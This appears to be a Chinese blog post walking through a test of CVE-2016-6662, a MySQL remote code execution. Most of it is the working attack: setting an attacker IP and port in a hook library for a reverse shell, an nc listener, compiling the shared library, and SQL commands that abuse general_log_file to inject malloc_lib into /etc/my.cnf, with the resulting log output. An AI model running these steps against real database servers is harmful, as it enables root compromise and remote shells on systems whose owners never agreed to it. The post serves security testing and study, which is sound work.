• CVE-2016-6662 mysql RCE测试

    参考:http://bobao.360.cn/learning/detail/3027.html ,我尝试第一种方法

    1.先修改mysql_hookandroot_lib.c里面的反弹地址和端口:

    #define ATTACKERS_IP "xx.x.x.x"
#define SHELL_PORT 81

    在攻击者机器上做好端口监听,等待反弹:

    nc -lvv -p 81

      

    2.编译库
    gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl


    3.执行命令:

    mysql> set global general_log_file = '/etc/my.cnf';

mysql> set global general_log = on;

mysql> select '
[mysqld]
malloc_lib=/tmp/mysql/mysql_hookandroot_lib.so

[separator]

';

mysql> set global general_log = off;

      

    4.可以发现my.cnf添加的内容

    /usr/local/mysql/bin/mysqld, Version: 5.5.48-log (Source distribution). started with:
Tcp port: 3306 Unix socket: /tmp/mysql.sock
Time Id Command Argument
160914 17:45:16 1 Query select '
[mysqld]
malloc_lib=/tmp/mysql/mysql_hookandroot_lib.so

[separator]

'
160914 17:45:22 1 Query set global general_log = off

      

    5 然后重启mysql,mysql重启会报错

    leo@ubuntu:~$ sudo /etc/init.d/mysql restart
[....] Restarting mysql (via systemctl): mysql.serviceJob for mysql.service failed because the control process exited with error code. See "systemctl status mysql.service" and "journalctl -xe" for details.
failed!
  • 相关阅读:
    全角 半角转换 .net
    [下载]微软Windows命令行PowerShell 2.0
    logstash收集java程序日志
    使用filebeat替代logstash收集日志
    Kibanna图形统计
    MySQL Blind Sql Injection
    超级后门泄露版
    HACKING WITH JAVASCRIPT
    Exploiting Common Vulnerabilities in PHP Applications
    3389安全记录批处理
  • 原文地址:https://www.cnblogs.com/xiaoxiaoleo/p/5873091.html
Copyright © 2020-2023  润新知